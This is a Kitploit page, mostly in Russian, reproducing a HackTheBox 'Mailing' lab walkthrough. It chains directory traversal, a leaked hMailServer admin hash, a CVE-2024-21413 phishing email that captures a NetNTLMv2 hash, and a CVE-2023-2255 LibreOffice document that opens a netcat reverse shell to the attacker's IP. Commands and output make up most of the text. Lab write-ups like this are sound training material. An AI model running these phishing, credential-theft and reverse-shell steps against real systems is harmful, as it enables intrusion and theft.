Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
HTB-Mailing-A-Complete-Walkthrough — If you've been grinding through HackTheBox machines, Mailing is one of those boxes that genuinely teaches you something. It's rated Easy, runs on Windows, and chains together a few real-world vulnerabilities — a directory traversal, a credential leak, CVE-2024-21413, and a LibreOffice macro exploit. Let's walk through it step by step. | Kitploit
Инструменты/GitHubGitHub/themursalin/htb-mailing-a-complete-walkthrough
Password CrackingPrivilege EscalationReconnaissanceVulnerability AnalysisExploitationLateral MovementPhishingWeb SecurityCTF

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

If you've been grinding through HackTheBox machines, Mailing is one of those boxes that genuinely teaches you something. It's rated Easy, runs on Windows, and chains together a few real-world vulnerabilities — a directory traversal, a credential leak, CVE-2024-21413, and a LibreOffice macro exploit. Let's walk through it step by step.

Penetration Testing
Learning & Education
GitHubthemursalin/htb-mailing-a-complete-walkthrough

HTB-Mailing-A-Complete-Walkthrough

Репозиторий
4 месяцев назадЕщё не проверено
Поделиться

HTB: Mailing — Полное прохождение

Автор: Mursalin


Если вы штурмуете машины HackTheBox, Mailing — одна из тех, которые действительно чему-то учат. Она оценена как лёгкая, работает под Windows и объединяет несколько реальных уязвимостей: обход каталогов, утечку учётных данных, CVE-2024-21413 и эксплойт макроса LibreOffice. Давайте пройдём её шаг за шагом.


Разведка

Как обычно, начинаем со сканирования nmap, чтобы понять, с чем имеем дело:

root@kitploit:~
nmap -p- --min-rate 10000 10.10.11.14
nmap -p [ports] -sCV 10.10.11.14

Результаты показывают довольно много открытых портов. Основные:

  • Порт 80 — HTTP (перенаправляет на mailing.htb)
  • Порты 25, 465, 587 — SMTP
  • Порты 110, 993 — POP3 / IMAP (работает на hMailServer)
  • Порт 445 — SMB
  • Порт 5985 — WinRM (интересно, если у нас будут учётные данные)

Отпечаток ОС соответствует Windows 10 или Server 2019, а версия IIS подтверждает, что это как минимум IIS 10. Также замечаем, что подпись SMB-сообщений включена, но не обязательна — запомним на будущее.

Почтовые порты повсюду, но для них, скорее всего, потребуются учётные данные. Веб-сервер на порту 80 — очевидная отправная точка.


Разведка веба

После добавления mailing.htb в /etc/hosts сайт выглядит как почтовая хостинговая компания на базе hMailServer. Ничего примечательного на поверхности — раздел «О нас», раздел «Команда» с тремя именами (Ruy Alonso, Maya Bendito, Gregory Smith) и кнопка «Инструкции по загрузке».

Кнопка загрузки указывает на:

root@kitploit:~
http://mailing.htb/download.php?file=instructions.pdf

Параметр file= сразу вызывает подозрения. Давайте проверим его.

Запустил ffuf для поиска поддоменов — ничего интересного не нашёл. Затем feroxbuster для перебора директорий — тоже ничего нового, кроме download.php. Так что всё внимание сосредоточено на этой единственной конечной точке.


Обход каталогов → Чтение файлов

Тестируем параметр file на обход каталогов:

root@kitploit:~
curl http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts

И это сработало — мы получили содержимое файла hosts Windows. Приложение просто добавляет базовый путь к тому, что мы передаём, и вызывает file_get_contents(). Никакой санитизации, никаких ограничений. Исходный код download.php подтверждает это, когда мы читаем его напрямую:

root@kitploit:~
$file_path = 'C:/wwwroot/instructions/' . $file;
if (file_exists($file_path)) {
    echo file_get_contents($file_path);
}

Теперь у нас есть произвольное чтение файлов на машине Windows. Используем это.


Утечка хеша администратора hMailServer

hMailServer хранит свою конфигурацию в hMailServer.ini. После небольшого исследования выясняется, что файл находится по адресу:

root@kitploit:~
C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini

Читаем его через наш обход:

root@kitploit:~
curl 'http://mailing.htb/download.php?file=../../Program+Files+(x86)/hMailServer/bin/hMailServer.ini'

Вывод включает:

root@kitploit:~
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

[Database]
Password=0a9f8ad8bf896b501dde74f08efd7e4c

Два MD5-хеша. Загружаю их в CrackStation:

  • 841bb5acfa6779ae432fd7a4e6600ba7 → homenetworkingadministrator
  • Второй → Не найден

Итак, у нас есть пароль администратора для hMailServer. Попытка использовать его для SMB как пользователь Windows administrator не удаётся — это не пароль локальной учётной записи, а только пароль администратора почтового сервиса. Однако он работает для аутентификации в SMTP-сервисе, что нам и нужно.


CVE-2024-21413 — Фишинг Maya через Windows Mail

Теперь нужно получить опору как реальный пользователь. На сайте упоминается, что используемый почтовый клиент — Windows Mail (согласно PDF-файлу с инструкциями по установке). Пора проверить известные уязвимости.

CVE-2024-21413 — это уязвимость удалённого выполнения кода в Microsoft Outlook и Windows Mail. Проблема заключается в том, как клиенты обрабатывают URL-адреса протокола file:// в телах писем. Обычно на разные протоколы накладываются ограничения безопасности. Однако исследователи обнаружили, что если URL заканчивается на !что-угодно, эти ограничения молча снимаются. Когда пользователь открывает или даже просматривает письмо с такой ссылкой, клиент автоматически пытается аутентифицироваться на SMB-сервере атакующего — передавая NetNTLMv2-хеш.

На GitHub есть хороший PoC от xaitax. Я клонирую его и запускаю с такими параметрами:

root@kitploit:~
python CVE-2024-21413.py \
  --server mailing.htb \
  --port 587 \
  --username [email protected] \
  --password homenetworkingadministrator \
  --sender [email protected] \
  --recipient [email protected] \
  --url "\\10.10.14.6\share\sploit" \
  --subject "Проверь это срочно!"

Письмо отправляется успешно. Тем временем на моей атакующей машине запущен Responder для перехвата входящей аутентификации:

root@kitploit:~
sudo /opt/Responder/Responder.py -I tun0

Через минуту или около того клиент Maya открывает письмо, и Responder захватывает её NetNTLMv2-хеш. Я взламываю его с помощью hashcat:

root@kitploit:~
hashcat -m 5600 maya_hash.txt /usr/share/wordlists/rockyou.txt

Пароль взломан: m4y4ngs4ri


Оболочка от имени Maya

С учётными данными Maya подключаюсь через Evil-WinRM:

root@kitploit:~
evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'

Мы внутри. Флаг пользователя лежит на рабочем столе Maya.


Повышение привилегий — CVE-2023-2255 (LibreOffice)

Пришло время искать путь к root. Исследуя систему, обнаруживаю общую папку с названием Important Documents, и установлен LibreOffice. Это сильный намёк на CVE-2023-2255.

CVE-2023-2255 затрагивает версии LibreOffice до 7.4.7 и 7.5.3. Она использует «плавающие фреймы» — связанные внешние файлы внутри документов .odt. Уязвимость позволяет загружать эти фреймы без запроса разрешения у пользователя, а содержимое может быть макросом, который выполняется при загрузке документа.

PoC от elweth-sec генерирует вредоносный .odt, содержащий команду оболочки. Структура документа включает тег <script> в content.xml, который срабатывает в момент открытия файла LibreOffice.

Генерирую полезную нагрузку для обратной оболочки:

root@kitploit:~
python /opt/CVE-2023-2255/CVE-2023-2255.py \
  --cmd 'cmd.exe /c C:\ProgramData\nc64.exe -e cmd.exe 10.10.14.6 443' \
  --output exploit.odt

Затем загружаю файл .odt и nc64.exe в общую папку SMB Important Documents, используя учётные данные Maya:

root@kitploit:~
smbclient '//10.10.11.14/important documents' --user maya --password m4y4ngs4ri
smb: \> put exploit.odt
smb: \> put nc64.exe

Из оболочки WinRM Maya копирую nc64.exe в C:\ProgramData, чтобы макрос мог его найти:

root@kitploit:~
copy "\Important Documents\nc64.exe" nc64.exe

Через минуту-другую что-то на машине открывает документ (вероятно, автоматическая запланированная задача), и я перехватываю оболочку на своём netcat-слушателе:

root@kitploit:~
rlwrap -cAr nc -lnvp 443
Прослушивание на 0.0.0.0 443
Получено соединение от 10.10.11.14
Microsoft Windows [Версия 10.0.19045.4355]

C:\Program Files\LibreOffice\program> whoami
mailing\localadmin

Мы работаем от имени localadmin — и флаг root находится на рабочем столе.


Бонус: Непредусмотренный путь (до исправления)

Машина была исправлена 15 мая 2024 года — всего через 11 дней после выхода — потому что исходный download.php на самом деле использовал PHP-функцию include() вместо file_get_contents(). Это превращало простое чтение файла в полноценную уязвимость Local File Inclusion, то есть любой PHP-код в читаемом файле выполнялся.

Непредусмотренный путь заключался в отравлении SMTP-логов hMailServer (подключение через telnet и внедрение PHP в команду HELO), а затем включение этого лог-файла через LFI для получения выполнения кода от имени defaultapppool. Оттуда SeImpersonatePrivilege + GodPotato = SYSTEM. Совсем другой маршрут к root.


Резюме

Цепочка атак на Mailing выглядит так:

  1. Чтение файлов через обход каталогов в download.php
  2. Утечка учётных данных из hMailServer.ini → взлом MD5-хеша администратора
  3. CVE-2024-21413 → фишинг Maya, захват и взлом её NetNTLMv2-хеша
  4. Оболочка WinRM от имени Maya с помощью взломанных учётных данных
  5. CVE-2023-2255 → вредоносный документ LibreOffice, помещённый в отслеживаемую общую папку → оболочка от localadmin

Эта машина отлично демонстрирует объединение реальных CVE в правдоподобную цепочку. Шаги эксплуатации не слишком сложны, но на каждом этапе нужно понимать, что делаешь. Определённо стоит повторить, если готовишься к OSCP.


Спасибо за чтение! Подписывайтесь на меня в Medium, чтобы не пропустить новые прохождения HTB и CTF.

— Mursalin

Скачать инструмент